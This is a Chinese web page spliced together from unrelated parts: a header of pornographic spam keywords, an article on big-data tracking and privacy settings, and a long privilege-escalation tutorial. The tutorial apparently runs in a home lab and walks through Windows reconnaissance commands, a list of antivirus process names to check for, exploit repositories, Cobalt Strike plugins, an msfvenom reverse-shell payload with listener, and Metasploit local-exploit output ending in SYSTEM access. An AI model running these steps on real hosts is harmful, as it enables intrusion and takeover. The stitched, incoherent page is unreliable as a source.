欧美vvv,亚洲第一成人在线,亚洲成人欧美日韩在线观看,日本猛少妇猛色XXXXX猛叫

新聞資訊

    閱讀此文前,點下關注,方便您進行討論和分享,感謝您的支持和理解!

    導語:

    手機廣告推送、內容循環、陌生號碼騷擾,這些看似偶然的現象其實都與大數據監控有關。本文將揭開大數據監控的可怕內幕,為您提供保護隱私的方法。讓我們一起了解背后的黑幕,學會維護個人信息安全。

    ---

    隨著科技的進步,我們的生活變得越來越便捷,但也伴隨著一個巨大的代價:隱私的泄露。當你覺得手機一打開就推送各種廣告,當你喜歡的內容不斷循環出現,當陌生號碼頻繁騷擾你時,或許你曾以為這都是偶然事件,然而實際上,這一切都源自手機背后不可見的大數據監控。

    首先,讓我們來揭開第一個謎團:為什么你搜索的商品會如影隨形地出現在各個網站的廣告位上?這并非巧合,而是大數據監控系統的精密計算。當你在手機上輸入關鍵詞進行搜索時,背后的監控系統已經捕捉到了這些詞條。接下來,它將分析你的搜索歷史、瀏覽習慣以及其他相關信息,然后使用強大的算法,向你推送所謂的“精準”廣告。不論你點擊哪個網站或應用,你都會看到與你搜索相關的廣告。

    例如,搜索了羽絨服后,無論你在社交媒體、購物應用還是新聞網站上瀏覽,都會頻繁看到羽絨服的廣告。這就是大數據監控利用你的興趣和需求,將你引導至購買頁面的方式。

    這種情況并不僅限于廣告。你可能會在社交媒體上發現,你點贊或轉發的內容不斷在首頁重復出現。這一現象同樣是大數據監控的結果,它根據你的行為歷史,精心調整你的信息流,將你的興趣點變得越來越狹窄。舉例來說,如果你在社交媒體上頻繁點贊貓咪視頻,算法會認為你對這些內容感興趣,于是增加了這類視頻的推送量。

    這種循環導致了你的信息流單一化,逐漸削弱了你的信息多樣性。

    但問題遠不止于此。你是否曾收到陌生號碼發來的騷擾短信或電話?這可能是因為你的個人信息已經泄露。通常情況下,陌生號碼無法輕易獲得你的聯系方式,但當你在某個網站或應用上提供了手機號碼,你的信息可能已經泄露。此時,大數據監控系統會將你的手機號與其他信息相結合,精準鎖定你的興趣和需求,然后發送相關的騷擾信息。

    這些信息看似針對你的興趣制定,但實際上卻是騷擾的一種形式。

    那么,面對如此強大的大數據監控系統,我們應該如何保護自己的隱私安全呢?首先,關閉手機中各種默認的“用戶體驗計劃”,這些計劃悄悄收集你的瀏覽記錄和使用習慣,并共享給算法系統。其次,關閉個性化推薦和個性化廣告,這些功能依賴于個人信息的收集,關閉后可以降低信息泄露風險。此外,審查哪些不常用的應用程序獲取了你的通訊錄、相機、麥克風等權限,并關閉不必要的權限,以減少信息的外泄。

    定期清除瀏覽器和應用的歷史記錄,使用隱私模式瀏覽敏感內容,都是保護隱私的有效方法。還可以查看手機中默認開啟的數據共享功能,限制分享范圍,避免數據泄露。

    最重要的是,我們要主動管理自己的信息流,不讓死結構的數據思維“喂飽”我們。要打開視野,尋找更多元的信息,不局限于監控系統推送的內容。

    在這個信息爆炸的時代,大數據監控已經無處不在。為了保護個人隱私,采取適當的措施是至關重要的。

    1. 權限提升介紹

    這里需要我們了解的權限提升大概分為:后臺權限,網站權限,數據本權限。接口權限,系統權限。域控權限等。

    1.1. 權限說明

    • 后臺權限:SQL注入,數據庫備份泄露,默認或弱口令等獲取帳號密碼進入。
    • 網站權限:后臺提升至網站權限,RCE或文件操作類、反序列化等漏洞直達shell。
    • 數據庫權限:SQL注入數據庫備份泄露。默認或弱口令等進入或網站權限獲取后轉入。
    • 接口權限:SQL注入,數據庫備份泄露,源碼泄漏,配置不當等或網站權限獲取后轉入。
    • 系統權限:高危系統漏洞直達或網站權限提升轉入、數據庫權限提升轉入。第三方轉入等。
    • 域控權限:高危系統漏洞直達或內網橫向滲透轉入,域控其他服務安全轉入等。

    1.2. 權限提升后操作

    需要我們了解權限提升后能夠做什么事情,這里針對不同的權限,能夠做的事情也是不同的。

    • 后臺權限:常規WEB界面文章分類等操作,后臺功能可操作類。
    • 網站權限:查看或修改程序源代碼,可以進行網站或應用的配置文件讀取(接口配置信息,數據庫配置信息等),還能收集服務器操作系統相關的信息,為后續系統提權做準備。
    • 數據庫權限:操作數據庫的權限,數據庫的增刪改等,源碼或配置文件泄漏,也可能是網站權限(webshell)進行的數據庫配詈文件讀取獲得。也可以作為提升系統權限手段。
    • 接口權限:后臺或網站權限后的獲取途徑:后臺(修改配置信息功能點),網站權限(查看的配置文件獲取),具體可以操作的事情大家自己想想。
    • 系統權限:如同在你自己操作自己的電腦一樣。
    • 域控權限:如同在你自己操作自己的虛擬機一樣。

    1.3. 權限提升的意義

    這里的意義就是實現你想要達到的效果,例如當你獲取到一個服務器后,你想要開啟遠程桌面,但是你的權限不夠,那么你就需要對你的權限進行提示,以便實現開啟遠程桌面的能力,這就是權限提示的意義。

    同時后期也需要經常使用到權限提升,當然權限提升前提就需要得到一個主機。

    1.4. 權限提升整體流程

    后臺權限>web權限>系統權限>域控權限

    這里簡要說一下,首先需要獲取到后臺權限,然后獲取到web權限,這里的web權限也就是獲取到網站的權限,其次,當獲取到web權限后通過一系列方式獲取到系統權限,而域控權限,可能在部分網絡結構中沒有域控的概念,那么當你獲取到系統權限后,基本上就結束了,但是可能在有些網絡結構中比較關注域控,那么你還需要進一步的去獲取域控權限。

    1.5. 權限獲取方式

    通常來說,不同的權限對應的獲取方式也不同,當然也有部分權限獲取的方式是一樣的。同時在權限獲取的時候有些權限獲取是不確定在流程中哪一步中獲取到的,比如接口權限、數據庫權限、

    1.5.1. 特殊類型權限獲取流程

    這里的特殊類型的權限獲取,主要就說的是接口權限、數據庫權限這類的獲取,通常像后臺權限、web權限獲取都是有流程性的,而且這類是沒有流程性的,例如:

    • 數據庫權限:數據庫權限可能在獲取后臺之前就獲取到了,比如,通過掃描開放的端口,然后使用弱口令進去了,這種情況就屬于在后臺權限獲取之前,而如果是通過sql注入獲取到賬號密碼,那么就是在后臺之后,所以說不定。
    • 接口權限:基本上也是這樣的,可能在之前就獲取了,也有可能在之后獲取。

    1.5.2. 普通類型權限獲取流程

    平臺類型權限獲取,就是通常來說,都是這樣的進行獲取的,通常來說,不是必然…

    • 后臺權限獲取方式:弱口令、sql注入、數據泄露等。
    • web權限獲取方式:插件應用、數據庫、中間件、網站源碼后臺獲取。
    • 系統權限獲取方式(Windows):溢出漏洞、數據庫、第三方軟件等。

    2. 中間件語言類權限差異

    2.1. 常見的語言

    2.1.1. JSP權限

    這里我們執行一個id后,顯示的是root權限,如果想了解id這個命令是什么意思,可以去學一下Linux系統權限。這里網站是由jsp搭建的,這里需要注意jsp、java搭建的站點在連接上去后都是管理員權限,這是特性,不需要提權,直接就是系統權限。

    2.1.2. PHP權限

    2.1.2.1. Linux中PHP權限

    這里執行完是一個普通賬戶權限,并非是root權限,而這里是一步一步搭建的,就會按照軟件上自己配置設定的權限。而這里的權限就只是一個普通用戶權限,無法查詢其它的內容,只能查看當前軟件產生的目錄也就是網站目錄。

    2.1.2.2. Windows中PHP權限

    這里同樣也是一個普通賬戶權限,并非是Windows系統中最高權限,這里需要注意,如果是直接使用類似phpstudy這個集成環境搭建的網站就會繼承搭建人的權限。

    而這里想看什么就能看什么內容,因為權限夠的,相當于就是本地管理員權限。

    2.1.3. ASP權限

    這里獲取到的權限是網絡服務權限,也并非是Windows系統中最高權限,這里也是需要提權的。

    2.1.4. ASPX權限

    同樣這里獲取到的權限是網絡服務權限,也并非是Windows系統中最高權限,這里也是需要提權的。

    2.2. 權限劃分

    2.2.1. Linux

    管理員UID為0:系統管理員。

    系統用戶UID為1-999:Linux中設置的系統用戶。

    普通用戶UID為1000開始:由管理員創建用于日常工作的用戶。

    2.2.2. Windows

    用戶及用戶組:system、Administrator、user、guest等。

    2.3. 注意點

    這里不代表名稱不是root或者administrator就不是管理權限,因為在這些系統中會存在一些組的原因,當管理員把賬戶添加進入管理員組中,那么就能夠執行管理員權限。

    同時在Linux中是沒預留賬戶,直接會給你root賬戶,而Windows系統中只會給你一個administrator權限,Windows系統會預留一個system賬戶,這個賬戶和Linux中root賬戶是一樣的都是最高權限。

    所以在后面的權限提升的時候,我們都需要講賬戶提升至最高權限才能想干嘛干嘛。

    3. 后臺權限與web權限提升

    關于這里不會過多的贅述,因為在web漏洞方面都已經提到過了,不過都需要文件上傳或者進行代碼執行,講shell寫入,如果這個都過不去,那么后續的提升肯定是困難的,甚至直接就是無法操作。

    當然也有一些網站后臺功能點少,沒有辦法進行shell,那么也同樣,確實無法獲取權限。

    3.1. 后臺權限提升

    關于后臺權限提升這里,多數都是通過弱口令,或者sql注入獲取,這里我就不贅述了,這類也是最基礎的,同時也的最需要破解的,通常來說,如果破解不了后臺就很難獲取web權限。

    當然不是說只有獲取后臺權限才能獲取web權限,也可以通過web權限獲取后臺權限,不過這類都需要基于類似先獲取數據庫權限才能夠進行操作。

    當然遇到一個程序如果無思路,可以通過先搜索相關的程序名稱拿shell的資料,網上一般有很多這里的操作。

    3.2. web權限提升

    關于web權限提升方式,可以通過之前學過的,例如數據庫備份泄露、賬戶密碼、中間件漏洞、cms源碼漏洞等均可以獲取web權限,包括暴力破解等,都可以對web的權限進行提升,簡單來說,web權限提升其實就是獲取網站管理權限。

    web權限提升獲取,其實還是有很多方式的,這里只是一些常見的方式,如果還是沒有思路,最簡單的方式就是搜資料!!搜資料!!搜資料!!

    當然web權限提升不單單可以通過這些方式,還可以通過數據庫弱口令獲取到數據庫密碼,例如在部分網站中會存在phpmyadmin的數據庫管理平臺,網上有很多這個平臺獲取權限的方式,這里就不說了,當獲取到這個權限后,那么就可以寫入shell,通過webshell管理軟件連接上去,翻目錄通常就能找到后臺密碼。

    這里多數就是實現數據庫權限提升到web權限提升的跨域。

    但是這里不單單只有數據庫權限跨域到web權限,也會存在web權限跨域到數據庫權限。那么web權限也可以通過第三方插件或者第三方軟件的漏洞獲取web權限,然后通過連接shell,然后在網站目錄中尋找源碼,通常就能夠尋找到數據庫的賬戶密碼。

    4. Windows提權

    Windows提權大概有三個方向:溢出提權、數據庫提權、第三方軟件提權、錯誤的系統配置提權、組策略首選項提權、竊取令牌提權、bypassuac提權,第三方軟件/服務提權,WEB中間件漏洞提權等。

    如果遇到無法執行命令的話,可以試著上傳cmd.exe文件之可執行的目錄下。

    4.1. Windows提權常見步驟

    4.1.1. 信息收集

    信息收集》操作系統版本》系統位數》漏洞補丁》殺軟防護》網絡》當前權限等信息。

    4.1.1.1. 常見命令

    systeminfo 查詢系統信息
    hostname 主機名
    net user 查看用戶信息
    netstat -ano|find "3389" 查看服務pid號
    wmic os get caption 查看系統名
    wmic qfe get Description,HotFixID,InstalledOn 查看補丁信息
    wmic product get name,version 查看當前安裝程序
    wmic service list brief 查詢本機服務
    wmic process list brief 查詢本機進程
    net share 查看本機共享列表
    netsh firewall show config 查看防火墻配置

    4.1.1.2. 常見殺軟程序名稱

    360sd.exe 360殺毒
    360tray.exe 360實時保護
    ZhuDongFangYu.exe 360主動防御
    KSafeTray.exe 金山衛士
    SafeDogUpdateCenter.exe 安全狗
    McAfee McShield.exe McAfee
    egui.exe NOD32
    AVP.exe 卡巴斯基
    avguard.exe 小紅傘
    bdagent.exe BitDefender
    RavMonD.exe 瑞星殺毒
    QQPCRTP.exe QQ電腦管家
    hipstray.exe 火絨殺毒

    4.2. 溢出提權

    基于補丁》系統版本》位數來篩選可用溢出漏洞EXP。

    4.2.1. 溢出提權介紹

    此提權方法是利用系統本身存在的一些系統內核溢出漏洞,但未曾打相應的補丁,攻擊者通過對比systeminfo信息中的補丁信息來查找缺失的補丁號,通過缺失補丁號對照相應的系統版本查找對應可以提權提升的exp。

    不過這里需要注意,只要對應的補丁號加上對應的系統的版本的提權exp才可以成功,有時候如果查找到提權exp提權不成功,那么就可以查看是不是系統版本沒對應上,且不排除一些提權漏洞利用需要相應的環境。

    這里使用Windows10,同時基于已經拿到基礎權限,并且通過文件上傳連接到Windows10系統上了。

    4.2.2. 溢出提權三種方式

    • 手動提權:手動提權就是基于自己去搜集相關的補丁,然后進行提權。
    • CS半自動化提權:上傳木馬,然后通過一下插件實現半自動化提權。
    • MSF全自動提權:MSF就是通過內置的一些功能,實現全自動提權。

    4.3. 手動溢出提權

    關于手動提權這里只能大致說一下整體的提權流程,關于演示,由于環境原因,確實不好進行演示,而且在提權中,不代表找到相應的EXP就一定能夠提權成功,在提權過程中可能會遇到很多的困難解決不好,最關鍵的就是殺毒軟件。

    4.3.1. 上線

    這里通過文件上傳已經將一句話木馬連接上去,并且用戶只是一個普通用戶,這里的admin是我自己設置的,我們提權需要提到system權限才可以執行我們想要的任何操作。

    4.3.2. 信息收集

    4.3.2.1. 查找補丁信息及版本信息

    通過信息收集我們獲取到,該系統是一個Windows10 專業版,其實這里就已經將打的補丁顯示出來了,只是這里并未進行補丁修補而已,所以沒有記錄。

    4.3.2.2. 查詢殺軟信息

    查看是否存在殺軟,也就是運行軟件中,看看是否存在相關的殺毒軟件,這里我們查詢后發現,并沒殺毒軟件,不過需要注意的是,正常情況下那臺服務器沒有殺毒軟件,而且部分殺毒軟件還能夠自動識別是否在執行提權操作。

    上面是通過手動比較來進行查看是否存在殺軟,這里采用在線的殺軟比較,確實不存在殺軟。

    在線殺軟查詢:https://i.hacking8.com/tiquan/

    4.3.2.3. 自動提權可利用EXP編號

    這里尋找可利用的exp,注意這里我本地安裝的虛擬機我找了好幾個都是沒有安裝任何補丁的,所以提交上去顯示也是無法進行比較的。這里就把整個流程都說一下吧,一般情況下手動提權還是比較困難的,而且比較費事。

    在進行提權輔助的時候,需要將下面的遠程代碼執行取消,由于我們只需要進行權限提升,所以我們只查詢權限提升的方式,其它的我們不管。

    提權EXP識別平臺:https://i.hacking8.com/tiquan/

    python工具識別:https://github.com/AonCyberLabs/Windows-Exploit-Suggester

    當查詢相關的可進行權限提升的編號后,會在頁面的下方顯示出相應的編號,任何去尋找相應的編號的EXP即可。

    4.3.3. 尋找EXP

    尋找EXP是尋找通過之前補丁識別出來的可利用的EXP編號,通過尋找到的EXP然后進行利用,這里我本地也是也不好演示,所以就不演示了,正常相應的EXP找到后,都會存在利用方式的,并且通過截圖演示,也看不出效果。

    這里還需要注意,尋找到的EXP不代表就一定能夠提權成功,因為你不知道編寫EXP的人的測試環境是什么情況,比如人家在Windows10 2022H1上能夠成功,但是你在2022H2上不一定能夠成功,雖然都沒安裝補丁,但是就會出現這種,提權不了的情況。

    下面列舉幾個尋找EXP的地址。

    https://github.com/Ascotbe/Kernelhub/tree/master/Windows

    https://github.com/lyshark/Windows-exploits

    https://github.com/SecWiki/windows-kernel-exploits

    https://github.com/klsfct/getshell

    比如這里上面的截圖的CVE-2021-1732的EXP,以及在頁面的下方都列舉出利用的方式。

    當然如果說尋找到EXP編號后,在這些地址中并沒有可利用的exp信息,那么可以直接在github上搜索即可,可以看到搜索后顯示出很多的EXP都可以進行測試。

    4.3.4. 提權EXP運行方式

    • 直接執行exe程序,成功后會打開一個cmd窗口,在新窗口中權限就是system
    • 在WebShell中執行exe程序,執行方式為xx.exe whoami,成功后直接執行命令,再修改命令內容,可以執行不同的命令
    • 利用MSF等工具
    • C++源碼,Python腳本,PowerShell腳本等特殊方式

    4.4. CS半自動化溢出提權

    CS半自動提權,簡單來說就是當你把文件上傳上去后,然后通過CS生成一個后門,將后門上傳至服務器中,再使用CS上安裝的各類插件來進行半自動化提權。

    這里可能不單單使用的是溢出提權,還有可能使用的是其它的提權方式。

    這里使用的是Windows2012環境。

    CS工具介紹:Cobalt Strike工具安裝與基礎使用

    4.4.1. 上線

    這里通過CS生成木馬上傳,并執行,通常來說通過文件上傳獲取到的權限都比較低,所以在運行木馬的時候,也都是普通權限運行,導致木馬也就是普通權限,只有當使用管理員啟動,才是基本的管理員權限。

    這里不用太在意我這個上線就是administrator權限,我們主要目標就是system的權限。

    4.4.2. 提權插件

    這里推薦幾個提權插件,這些插件都是經過測試的,像之前手動提權,多多少少存在編寫EXP人的和你的環境不同,可能就導致別人能夠提權成功,而你無法提權成功的情況。

    這些插件都集成了很多的功能,原版CS上的功能很少,基本上就是一個類似MSF的一個圖像化工具,當裝上插件后,就可以使得CS搖身一變,變成內網大殺器。

    梼杌:https://github.com/pandasec888/taowu-cobalt-strike

    ladon:https://github.com/k8gege/Aggressor

    4.4.3. 當前權限

    通過輸入命令查看,當前權限就是一個普通權限,雖然可能能夠執行一些管理員的操作,但是我們需要的是將權限提升到system,這樣我們想執行什么命令就能夠執行什么命令。

    4.4.4. 提權操作

    4.4.4.1. 選擇提權方式

    這里使用梼杌進行提權,選擇sweetpotato,然后繼續提權。

    4.4.4.2. 提權成功

    可以看到這里彈出一個system的權限連接,即證明提權成功,當然這里不代表任何一個提權都能夠成功的,有些提權方式可能會由于操作系統的不同,導致失敗,這里我選擇sweetpotato進行提權就是的,前面幾個都提權失敗了,有不成功的,有系統不匹配的,所以多試試,當然也可以安裝更多的插件,使用不同插件中的不同的提權方式,總之多試試。

    4.5. MSF全自動溢出提權

    如果對MSF工具不熟悉的可以參考以下的連接進行學習,這個只是上篇,在博客主頁中能夠找到下篇。這里使用的環境是Windows7,由于Windows2012上沒有補丁信息,就會導致無法識別的情況。

    MSF工具使用:Metasploit工具使用(上)

    Metasploit工具使用(下)

    4.5.1. 監聽操作

    4.5.1.1. 生成木馬

    通過msfvenom生成一個木馬,然后將木馬上傳至服務器中,即可。

    命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.20 LPORT=3333 -f exe -o msf.exe
    LHOST=kali地址
    LPORT=自定義設置一個端口

    4.5.1.2. 監聽木馬

    msf6 > use exploit/multi/handler
    [*] Using configured payload generic/shell_reverse_tcp
    msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp ##配置監聽TCP
    payload=> windows/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set lport 3333 ##配置監聽端口
    lport=> 3333
    msf6 exploit(multi/handler) > set lhost 0.0.0.0 ##配置監聽地址,你也可以設置監聽本機地址如192.168.10.20
    lhost=> 0.0.0.0
    msf6 exploit(multi/handler) > run ##開始監聽

    4.5.1.3. 上線

    當將木馬上傳后,然后進行運行,即可在kali中顯示上線選項,并自動反彈會話窗口,可以看到這里監聽到192.168.10.150上線。

    4.5.1.4. 查看權限

    這里還是一樣的獲取到的權限是administrator,由于演示麻煩,未直接從webshell上執行,所以才會出現administrator的權限,但是不用管,我們需要的是將權限提升到system。

    4.5.2. 半自動化提權操作

    4.5.2.1. 提權模塊

    use post/windows/gather/enum_patches 半自動:根據漏洞編號找出系統中安裝的補丁

    4.5.2.2. 操作設置

    這里半自動化,在獲取后,還是需要手動去找,這里就和手動溢出漏洞提權差不多,所以這里就演示一下。

    msf6 exploit(multi/handler) > use post/windows/gather/enum_patches   ##設置半自動提權
    msf6 post(windows/gather/enum_patches) > options  ##查看參數
    
    Module options (post/windows/gather/enum_patches):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION  1                yes       The session to run this module on
    
    
    View the full module info with the info, or info -d command.
    
    msf6 post(windows/gather/enum_patches) > set session 2  ##設置編號,也就是剛剛上線的編號。
    session=> 2
    msf6 post(windows/gather/enum_patches) > run  ##開始收集
    
    [*] Running module against ADMIN-PC (192.168.10.40)
    
    Installed Patches=================HotFix ID  Install Date
      ---------  ------------
      KB2534111  1/5/2023
      KB976902   11/21/2010
    
    [*] Patch list saved to /root/.msf4/loot/20230316101403_default_192.168.10.40_enum_patches_978734.txt
    [*] Post module execution completed
    

    4.5.3. 全自動化提權操作

    4.5.3.1. 提權模塊

    use post/multi/recon/local_exploit_suggester 全自動:快速識別系統中可能利用的漏洞

    4.5.3.2. 操作設置

    這里需要注意,如果出現的漏洞比較少,可以將參數SHOWDESCRIPTION,設置為true。

    msf6 > use post/multi/recon/local_exploit_suggester  ##設置全自動化提權
    msf6 post(multi/recon/local_exploit_suggester) > options   ##設置參數
    
    Module options (post/multi/recon/local_exploit_suggester):
    
       Name             Current Setting  Required  Description
       ----             ---------------  --------  -----------
       SESSION                           yes       The session to run this module on
       SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
    
    
    View the full module info with the info, or info -d command.
    
    msf6 post(multi/recon/local_exploit_suggester) > set session 2   ##設置會話編號
    session=> 2
    msf6 post(multi/recon/local_exploit_suggester) > run  ##開始檢測
    

    4.5.3.3. 提權結果

    在結果中,yes是可能存在的漏洞利用,no是沒有的意思,這里我直接使用代碼信息來表示吧,截圖太大了。

    msf6 post(multi/recon/local_exploit_suggester) > run
    
    [*] 192.168.10.40 - Collecting local exploits for x86/windows...
    [*] 192.168.10.40 - 174 exploit checks are being tried...
    [+] 192.168.10.40 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
    [+] 192.168.10.40 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
    [+] 192.168.10.40 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
    [+] 192.168.10.40 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
    [+] 192.168.10.40 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
    [+] 192.168.10.40 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
    [+] 192.168.10.40 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
    [+] 192.168.10.40 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
    [+] 192.168.10.40 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
    [+] 192.168.10.40 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
    [*] Running check method for exploit 41 / 41
    [*] 192.168.10.40 - Valid modules for session 2:============================#   Name                                                           Potentially Vulnerable?  Check Result
     -   ----                                                           -----------------------  ------------
     1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
     2   exploit/windows/local/ikeext_service                           Yes                      The target appears to be vulnerable.
     3   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.
     4   exploit/windows/local/ms13_053_schlamperei                     Yes                      The target appears to be vulnerable.
     5   exploit/windows/local/ms13_081_track_popup_menu                Yes                      The target appears to be vulnerable.
     6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
     7   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
     8   exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.
     9   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.
     10  exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.
     11  exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
     12  exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
     13  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
     14  exploit/windows/local/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system
     15  exploit/windows/local/bits_ntlm_token_impersonation            No                       The target is not exploitable.
     16  exploit/windows/local/bthpan                                   No                       The target is not exploitable.
     17  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
     18  exploit/windows/local/bypassuac_sluihijack                     No                       The target is not exploitable.
     19  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
     20  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
     21  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.
     22  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.
     23  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
     24  exploit/windows/local/ipass_launch_app                         No                       The target is not exploitable.
     25  exploit/windows/local/lenovo_systemupdate                      No                       The target is not exploitable.
     26  exploit/windows/local/lexmark_driver_privesc                   No                       The check raised an exception.
     27  exploit/windows/local/mqac_write                               No                       The target is not exploitable.
     28  exploit/windows/local/ms10_015_kitrap0d                        No                       The target is not exploitable.
     29  exploit/windows/local/ms14_070_tcpip_ioctl                     No                       The target is not exploitable.
     30  exploit/windows/local/ms15_004_tswbproxy                       No                       The target is not exploitable.
     31  exploit/windows/local/ms16_016_webdav                          No                       The target is not exploitable.
     32  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  No                       The target is not exploitable.
     33  exploit/windows/local/ms16_075_reflection                      No                       The target is not exploitable.
     34  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
     35  exploit/windows/local/ms_ndproxy                               No                       The target is not exploitable.
     36  exploit/windows/local/novell_client_nicm                       No                       The target is not exploitable.
     37  exploit/windows/local/ntapphelpcachecontrol                    No                       The target is not exploitable.
     38  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
     39  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
     40  exploit/windows/local/virtual_box_guest_additions              No                       The target is not exploitable.
     41  exploit/windows/local/webexec                                  No                       The target is not exploitable.
    
    [*] Post module execution completed

    4.5.3.4. 執行提權

    注意這里我之前的操作都是使用Windows7來提權的,不過演示過程中,發現無法提權,后來到這里的時候切換為Windows2012了,這里需要注意,也間接性表面,提權的困難。

    這里選擇上面yes的模塊,并進行設置模塊,然后設置相關參數,這里仔細看,首先設置session,這個就是之前msf上線的編號,然后后面可以看到我將端口設置為6666,其實這里,有時候會出現命令執行成功了,但是并不能反彈會話窗口,那么這里我就重新設置了一個監聽,來監聽返回的端口。

    msf6 post(multi/recon/local_exploit_suggester)> use exploit/windows/local/ms16_075_reflection_juicy
    [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
    msf6 exploit(windows/local/ms16_075_reflection_juicy) > options 
    
    Module options (exploit/windows/local/ms16_075_reflection_juicy):
    
       Name     Current Setting                         Required  Description
       ----     ---------------                         --------  -----------
       CLSID    {4991d34b-80a1-4291-83b6-3328366b9097}  yes       Set CLSID value of the DCOM to trigger
       SESSION                                          yes       The session to run this module on
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  none             yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.10.20    yes       The listen address (an interface may be specified)
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    
    View the full module info with the info, or info -d command.
    
    msf6 exploit(windows/local/ms16_075_reflection_juicy) > set session 3
    session=> 3
    msf6 exploit(windows/local/ms16_075_reflection_juicy) > set lport 6666
    lport=> 6666
    msf6 exploit(windows/local/ms16_075_reflection_juicy) > run
    
    [-] Handler failed to bind to 192.168.10.20:6666:-  -
    [-] Handler failed to bind to 0.0.0.0:6666:-  -
    [+] Target appears to be vulnerable (Windows 2012 R2 (6.3 Build 9600).)
    [*] Launching notepad to host the exploit...
    [+] Process 1404 launched.
    [*] Reflectively injecting the exploit DLL into 1404...
    [*] Injecting exploit into 1404...
    [*] Exploit injected. Injecting exploit configuration into 1404...
    [*] Configuration injected. Executing exploit...
    [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
    [*] Exploit completed, but no session was created.
    msf6 exploit(windows/local/ms16_075_reflection_juicy) > 

    4.5.3.5. 返回端口

    設置監聽端口,應該不需要重新演示一遍了吧,這里就看效果吧!

    可以看到這里已經成功獲取system權限了。

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有